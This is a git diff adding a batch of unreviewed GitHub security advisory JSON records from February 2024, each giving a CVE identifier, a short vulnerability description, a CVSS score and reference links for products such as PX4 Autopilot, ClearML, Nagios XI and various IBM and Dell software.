a/advisories/unreviewed/2024/02/GHSA-f5rg-254c-x94v/GHSA-f5rg-254c-x94v.json b/advisories/unreviewed/2024/02/GHSA-f5rg-254c-x94v/GHSA-f5rg-254c-x94v.json new file mode 100644 index 0000000000000..c332d9ee335df --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-f5rg-254c-x94v/GHSA-f5rg-254c-x94v.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5rg-254c-x94v", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-24254" + ], + "details": "PX4 Autopilot 1.14 and earlier, due to the lack of synchronization mechanism for loading geofence data, has a Race Condition vulnerability in the geofence.cpp and mission_feasibility_checker.cpp. This will result in the drone uploading overlapping geofences and mission routes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24254" + }, + { + "type": "WEB", + "url": "https://github.com/Drone-Lab/PX4-Autopilot/blob/report-can-not-pause-vulnerability/Multi-Threaded%20Race%20Condition%20bug%20found%20in%20PX4%20cause%20drone%20can%20not%20PAUSE.md" + }, + { + "type": "WEB", + "url": "https://github.com/PX4/PX4-Autopilot" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-f7cf-fr2r-2cwx/GHSA-f7cf-fr2r-2cwx.json b/advisories/unreviewed/2024/02/GHSA-f7cf-fr2r-2cwx/GHSA-f7cf-fr2r-2cwx.json new file mode 100644 index 0000000000000..a44f7434d5317 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-f7cf-fr2r-2cwx/GHSA-f7cf-fr2r-2cwx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7cf-fr2r-2cwx", + "modified": "2024-02-07T15:30:49Z", + "published": "2024-02-07T15:30:49Z", + "aliases": [ + "CVE-2024-25201" + ], + "details": "Espruino 2v20 (commit fcc9ba4) was discovered to contain an Out-of-bounds Read via jsvStringIteratorPrintfCallback at src/jsvar.c.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25201" + }, + { + "type": "WEB", + "url": "https://github.com/espruino/Espruino/issues/2456" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-f7f8-8qv6-p289/GHSA-f7f8-8qv6-p289.json b/advisories/unreviewed/2024/02/GHSA-f7f8-8qv6-p289/GHSA-f7f8-8qv6-p289.json new file mode 100644 index 0000000000000..c42e9a7e7e647 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-f7f8-8qv6-p289/GHSA-f7f8-8qv6-p289.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7f8-8qv6-p289", + "modified": "2024-02-06T15:32:08Z", + "published": "2024-02-06T15:32:08Z", + "aliases": [ + "CVE-2024-24594" + ], + "details": "A cross-site scripting (XSS) vulnerability in all versions of the web server component of Allegro AI’s ClearML platform allows a remote attacker to execute a JavaScript payload when a user views the Debug Samples tab in the web UI.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24594" + }, + { + "type": "WEB", + "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T15:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-f86q-9xmw-hpfx/GHSA-f86q-9xmw-hpfx.json b/advisories/unreviewed/2024/02/GHSA-f86q-9xmw-hpfx/GHSA-f86q-9xmw-hpfx.json new file mode 100644 index 0000000000000..1f40d6b9a11ca --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-f86q-9xmw-hpfx/GHSA-f86q-9xmw-hpfx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f86q-9xmw-hpfx", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24498" + ], + "details": "Unrestricted File Upload vulnerability in Employee Management System 1.0 allows a remote attacker to execute arbitrary code via the edit-photo.php component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24498" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-Unauthenticated_Unrestricted_File_Upload_To_RCE.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fc5m-43m8-862c/GHSA-fc5m-43m8-862c.json b/advisories/unreviewed/2024/02/GHSA-fc5m-43m8-862c/GHSA-fc5m-43m8-862c.json new file mode 100644 index 0000000000000..44bbae4c0a08c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fc5m-43m8-862c/GHSA-fc5m-43m8-862c.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fc5m-43m8-862c", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6982" + ], + "details": "The Display custom fields in the frontend – Post and User Profile Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and postmeta in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6982" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3077b84e-87af-4307-83c5-0e4b15d07ff1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fcj4-pm86-7gjw/GHSA-fcj4-pm86-7gjw.json b/advisories/unreviewed/2024/02/GHSA-fcj4-pm86-7gjw/GHSA-fcj4-pm86-7gjw.json new file mode 100644 index 0000000000000..66c4890951235 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fcj4-pm86-7gjw/GHSA-fcj4-pm86-7gjw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fcj4-pm86-7gjw", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-1150" + ], + "details": "Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 7.3.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1150" + }, + { + "type": "WEB", + "url": "https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ff78-2q7q-3gpw/GHSA-ff78-2q7q-3gpw.json b/advisories/unreviewed/2024/02/GHSA-ff78-2q7q-3gpw/GHSA-ff78-2q7q-3gpw.json new file mode 100644 index 0000000000000..616e69b324cf8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ff78-2q7q-3gpw/GHSA-ff78-2q7q-3gpw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff78-2q7q-3gpw", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-22817" + ], + "details": "Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed by fixing DNS addresses that refer to loopback. This issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22817" + }, + { + "type": "WEB", + "url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fg4q-4pq7-35p9/GHSA-fg4q-4pq7-35p9.json b/advisories/unreviewed/2024/02/GHSA-fg4q-4pq7-35p9/GHSA-fg4q-4pq7-35p9.json new file mode 100644 index 0000000000000..2056fbe2464bf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fg4q-4pq7-35p9/GHSA-fg4q-4pq7-35p9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fg4q-4pq7-35p9", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2023-51072" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in the NOC component of Nagios XI version up to and including 2024R1 allows low-privileged users to execute malicious HTML or JavaScript code via the audio file upload functionality from the Operation Center section. This allows any authenticated user to execute arbitrary JavaScript code on behalf of other users, including the administrators.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51072" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/products/security/#nagios-xi" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fgv7-7rh4-3353/GHSA-fgv7-7rh4-3353.json b/advisories/unreviewed/2024/02/GHSA-fgv7-7rh4-3353/GHSA-fgv7-7rh4-3353.json new file mode 100644 index 0000000000000..792ce1a410b90 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fgv7-7rh4-3353/GHSA-fgv7-7rh4-3353.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fgv7-7rh4-3353", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22901" + ], + "details": "Vinchin Backup & Recovery v7.2 was discovered to use default MYSQL credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22901" + }, + { + "type": "WEB", + "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2024/Jan/30" + }, + { + "type": "WEB", + "url": "http://vinchin.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fh42-q9qf-98jh/GHSA-fh42-q9qf-98jh.json b/advisories/unreviewed/2024/02/GHSA-fh42-q9qf-98jh/GHSA-fh42-q9qf-98jh.json new file mode 100644 index 0000000000000..53db7e7a84cf4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fh42-q9qf-98jh/GHSA-fh42-q9qf-98jh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fh42-q9qf-98jh", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-47148" + ], + "details": "IBM Storage Protect Plus Server 10.1.0 through 10.1.15.2 Admin Console could allow a remote attacker to obtain sensitive information due to improper validation of unsecured endpoints which could be used in further attacks against the system. IBM X-Force ID: 270599.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47148" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270599" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7096482" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fjmm-xwcx-cxw3/GHSA-fjmm-xwcx-cxw3.json b/advisories/unreviewed/2024/02/GHSA-fjmm-xwcx-cxw3/GHSA-fjmm-xwcx-cxw3.json new file mode 100644 index 0000000000000..bf6124b321881 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fjmm-xwcx-cxw3/GHSA-fjmm-xwcx-cxw3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjmm-xwcx-cxw3", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50938" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 275128.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50938" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275128" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fm5q-rjfv-9xc2/GHSA-fm5q-rjfv-9xc2.json b/advisories/unreviewed/2024/02/GHSA-fm5q-rjfv-9xc2/GHSA-fm5q-rjfv-9xc2.json new file mode 100644 index 0000000000000..9dde49884aa66 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fm5q-rjfv-9xc2/GHSA-fm5q-rjfv-9xc2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fm5q-rjfv-9xc2", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20007" + ], + "details": "In mp3 decoder, there is a possible out of bounds write due to a race condition. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441369; Issue ID: ALPS08441369.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20007" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json b/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json new file mode 100644 index 0000000000000..d3719164a87dc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmj7-fpwq-79r4", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-38369" + ], + "details": "IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 261196.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38369" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/261196" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-521" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fmm6-q36g-mf2h/GHSA-fmm6-q36g-mf2h.json b/advisories/unreviewed/2024/02/GHSA-fmm6-q36g-mf2h/GHSA-fmm6-q36g-mf2h.json new file mode 100644 index 0000000000000..6d944bf865762 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fmm6-q36g-mf2h/GHSA-fmm6-q36g-mf2h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmm6-q36g-mf2h", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2020-29504" + ], + "details": "\nDell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.5.2, contain a Missing Required Cryptographic Step Vulnerability.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29504" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000181115/dsa-2020-286-dell-bsafe-crypto-c-micro-edition-4-1-5-and-dell-bsafe-micro-edition-suite-4-6-multiple-security-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fp29-pg6r-vvr7/GHSA-fp29-pg6r-vvr7.json b/advisories/unreviewed/2024/02/GHSA-fp29-pg6r-vvr7/GHSA-fp29-pg6r-vvr7.json new file mode 100644 index 0000000000000..4c8ca2052f343 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fp29-pg6r-vvr7/GHSA-fp29-pg6r-vvr7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fp29-pg6r-vvr7", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2022-34381" + ], + "details": "\nDell BSAFE SSL-J version 7.0 and all versions prior to 6.5, and Dell BSAFE Crypto-J versions prior to 6.2.6.1 contain an unmaintained third-party component vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to the compromise of the impacted system. This is a Critical vulnerability and Dell recommends customers to upgrade at the earliest opportunity.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34381" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000203278/dsa-2022-208-dell-bsafe-ssl-j-6-5-and-7-1-and-dell-bsafe-crypto-j-6-2-6-1-and-7-0-security-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1329" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fr9j-3pjm-gpxm/GHSA-fr9j-3pjm-gpxm.json b/advisories/unreviewed/2024/02/GHSA-fr9j-3pjm-gpxm/GHSA-fr9j-3pjm-gpxm.json new file mode 100644 index 0000000000000..892e7c000c8be --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fr9j-3pjm-gpxm/GHSA-fr9j-3pjm-gpxm.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fr9j-3pjm-gpxm", + "modified": "2024-02-04T18:30:19Z", + "published": "2024-02-04T18:30:19Z", + "aliases": [ + "CVE-2018-25098" + ], + "details": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in blockmason credit-protocol. It has been declared as problematic. Affected by this vulnerability is the function executeUcacTx of the file contracts/CreditProtocol.sol of the component UCAC Handler. The manipulation leads to denial of service. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 082e01f18707ef995e80ebe97fcedb229a55efc5. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252799. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25098" + }, + { + "type": "WEB", + "url": "https://github.com/blockmason/credit-protocol/pull/33" + }, + { + "type": "WEB", + "url": "https://github.com/blockmason/credit-protocol/commit/082e01f18707ef995e80ebe97fcedb229a55efc5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252799" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252799" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T17:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-frh8-cgp4-p7vp/GHSA-frh8-cgp4-p7vp.json b/advisories/unreviewed/2024/02/GHSA-frh8-cgp4-p7vp/GHSA-frh8-cgp4-p7vp.json new file mode 100644 index 0000000000000..1e02aebee625f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-frh8-cgp4-p7vp/GHSA-frh8-cgp4-p7vp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frh8-cgp4-p7vp", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51693" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themify Icons allows Stored XSS.This issue affects Themify Icons: from n/a through 2.0.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51693" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/themify-icons/wordpress-themify-icons-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-frmq-mwj6-5m79/GHSA-frmq-mwj6-5m79.json b/advisories/unreviewed/2024/02/GHSA-frmq-mwj6-5m79/GHSA-frmq-mwj6-5m79.json new file mode 100644 index 0000000000000..42db4dd61b486 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-frmq-mwj6-5m79/GHSA-frmq-mwj6-5m79.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frmq-mwj6-5m79", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20816" + ], + "details": "Improper authentication vulnerability in onCharacteristicWriteRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers connect to victim's mobile hotspot without user awareness.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20816" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-frpg-52qc-h9c8/GHSA-frpg-52qc-h9c8.json b/advisories/unreviewed/2024/02/GHSA-frpg-52qc-h9c8/GHSA-frpg-52qc-h9c8.json new file mode 100644 index 0000000000000..f4de34a91e504 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-frpg-52qc-h9c8/GHSA-frpg-52qc-h9c8.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frpg-52qc-h9c8", + "modified": "2024-02-06T00:30:28Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-23049" + ], + "details": "An issue in symphony v.3.6.3 and before allows a remote attacker to execute arbitrary code via the log4j component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23049" + }, + { + "type": "WEB", + "url": "https://github.com/88250/symphony/issues/82" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fv23-fj7r-w7w4/GHSA-fv23-fj7r-w7w4.json b/advisories/unreviewed/2024/02/GHSA-fv23-fj7r-w7w4/GHSA-fv23-fj7r-w7w4.json new file mode 100644 index 0000000000000..4565ab221276a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fv23-fj7r-w7w4/GHSA-fv23-fj7r-w7w4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fv23-fj7r-w7w4", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43520" + ], + "details": "Memory corruption when AP includes TID to link mapping IE in the beacons and STA is parsing the beacon TID to link mapping IE.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43520" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No 